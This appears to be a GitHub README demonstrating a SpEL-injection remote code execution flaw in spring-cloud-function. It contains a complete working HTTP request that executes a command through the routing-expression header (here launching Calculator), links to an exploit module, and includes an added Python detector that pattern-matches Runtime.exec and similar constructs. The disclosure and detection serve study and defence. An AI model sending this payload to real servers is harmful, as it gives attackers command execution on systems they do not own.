
spring-cloud-function SpEL RCE

Vulnerable target

You can build it yourself; here is the source of the vulnerable app.

Or you can use the release built by cckuailong (yeah, it's me):

java -jar function-sample-pojo-3.2.1.RELEASE.jar

P.S. Tested with Java 17.

PoC

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

Result

RCE!!
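As an added defender-side example (not part of this repo or of spring-cloud-function), a small Python check that parses a raw HTTP request like the one above and flags SpEL constructs in the spring.cloud.function.routing-expression header; the signature list and the two sample requests are constructed here. It is detection only; the actual fix is upgrading to a patched spring-cloud-function release.

```python
import re
from typing import Dict, List

# Header that the vulnerable router evaluates as a SpEL expression (from the PoC above).
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# Constructed signatures: SpEL constructs that have no business in a routing expression.
# A legitimate routing expression selects a function name, e.g. headers['function_name'].
SUSPICIOUS = [
    (r"\bT\s*\(", "SpEL type reference T(...)"),
    (r"\bnew\s+[A-Za-z_][\w.]*\s*\(", "constructor invocation"),
    (r"java\.lang\.(Runtime|ProcessBuilder)", "process-spawning class"),
    (r"\.exec\s*\(", "Runtime.exec call"),
]


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Parse the header block of a raw HTTP/1.1 request into a dict keyed by lowercase name."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head = raw.split(sep, 1)[0]
    headers: Dict[str, str] = {}
    for line in head.splitlines()[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: str) -> List[str]:
    """Return the findings for the routing-expression header; empty if absent or clean."""
    expr = parse_request_headers(raw).get(ROUTING_HEADER)
    if expr is None:
        return []
    return [desc for pattern, desc in SUSPICIOUS if re.search(pattern, expr)]


# Constructed samples: the PoC request from this page, and a benign routing expression.
MALICIOUS_REQUEST = (
    "POST /xxx HTTP/1.1\r\nHost: test.com:8080\r\n"
    "spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime()"
    '.exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")\r\n'
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 3\r\n\r\nxxx"
)
BENIGN_REQUEST = (
    "POST /xxx HTTP/1.1\r\nHost: test.com:8080\r\n"
    "spring.cloud.function.routing-expression: headers['function_name']\r\n\r\nxxx"
)

if __name__ == "__main__":
    print(inspect_request(MALICIOUS_REQUEST))  # three findings
    print(inspect_request(BENIGN_REQUEST))     # []
```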

[demo screenshot]

Enjoy it!

I put the PoC code in the repo:

https://github.com/cckuailong/pocsploit

https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py

[demo screenshot 2]

Article
